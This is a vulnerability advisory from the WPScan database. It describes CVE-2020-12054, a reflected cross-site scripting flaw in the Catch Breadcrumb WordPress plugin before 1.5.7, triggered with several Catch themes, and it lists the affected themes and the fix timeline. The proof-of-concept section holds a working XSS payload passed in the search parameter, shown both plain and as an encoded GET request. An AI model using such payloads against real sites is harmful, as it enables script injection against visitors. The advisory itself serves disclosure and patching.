Catch Breadcrumb < 1.5.7 - Unauthenticated Reflected XSS



Description
=== [ DESCRIPTION - REFLECTED XSS ] ========================================
# Catch Breadcrumb 1.5.4 plugin for WordPress allow Reflected XSS via a search query when used with one of the theme from the same author: Alchemist & Alchemist PRO, Izabel & Izabel PRO, Chique & Chique PRO, Clean Enterprise & Clean Enterprise PRO, Bold Photography PRO, Intuitive PRO, Devotepress PRO, Clean Blocks PRO, Foodoholic PRO, Catch Mag PRO, Catch Wedding PRO, Higher Education PRO.


=== [ AFFECTED CATCH THEMES ] ==============================================
# 00 - ALCHEMIST & ALCHEMIST PRO [ https://catchthemes.com/demo/alchemist/ ]
# 01 - IZABEL & IZABEL PRO [ https://catchthemes.com/demo/izabel/ ]
# 02 - CHIQUE & CHIQUE PRO [ https://catchthemes.com/demo/chique/ ]
# 03 - CLEAN ENTERPRISE & CLEAN ENTERPRISE PRO [ https://catchthemes.com/demo/clean-enterprise/ ]
# 04 - BOLD PHOTOGRAPHY PRO [ https://catchthemes.com/demo/bold-photography/ ]
# 05 - INTUITIVE PRO [ https://catchthemes.com/demo/intuitive/ ]
# 06 - DEVOTEPRESS PRO [ https://catchthemes.com/demo/devotepress/ ]
# 07 - CLEAN BLOCKS PRO [ https://catchthemes.com/demo/clean-blocks/ ]
# 08 - FOODOHOLIC PRO [ https://catchthemes.com/demo/foodoholic/ ]
# 09 - CATCH MAG PRO [ https://catchthemes.com/demo/catch-mag/ ]
# 10 - CATCH WEDDING PRO [ https://catchthemes.com/themes/catch-wedding-pro/ ]
# 11 - HIGHER EDUCATION PRO [ https://catchthemes.com/themes/higher-education-pro/ ]

Edit (WPScanTeam):
April 22nd, 2020 - Escalated to WP Plugins Team. Plugin Closed
April 23rd to 25th, 2020 - Various versions released, to add validation and sanitisation
Proof of Concept
=== [ STEPS TO REPRODUCE ] =================================================
# 00 - Install & activate any of the affected themes;
# 01 - Download the Catch Breadcrumb plugin from https://downloads.wordpress.org/plugin/catch-breadcrumb.zip or install it directly from WordPress admin dashboard;
# 02 - Activate the plugin;
# 03 - Go to the website;
# 04 - Use your XSS payload in a search query, f.e.: /?s=<img src=x onerror=window.location=`https://profiles.wordpress.org/exmi/`;>


=== [ PROOF-OF-CONCEPT ] ===================================================
GET /?s=%3Cimg+src%3Dx+onerror%3Dwindow.location%3D%60https%3A%2F%2Fprofiles.wordpress.org%2Fexmi%2F%60%3B%3E HTTP/1.1
Host: target.com


Note: If the payload is not triggered (can happen if the plugin has been installed before the theme for example), then go to the plugin settings (/wp-admin/admin.php?page=catch-breadcrumb) and click on the 'Save Changes' button.

Affects Plugin

fixed in version 1.5.7

References

CVE 2020-12054
URL https://catchplugins.com/
URL https://catchthemes.com/

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher ΞX.MI
Submitter ΞX.MI
Submitter Website https://ex-mi.ru/
Views 1477
Verified Yes
WPVDB ID 10184

Timeline

Publicly Published 2020-04-22 (about 1 month ago)
Added 2020-04-22 (about 1 month ago)
Last Updated 2020-04-30 (25 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin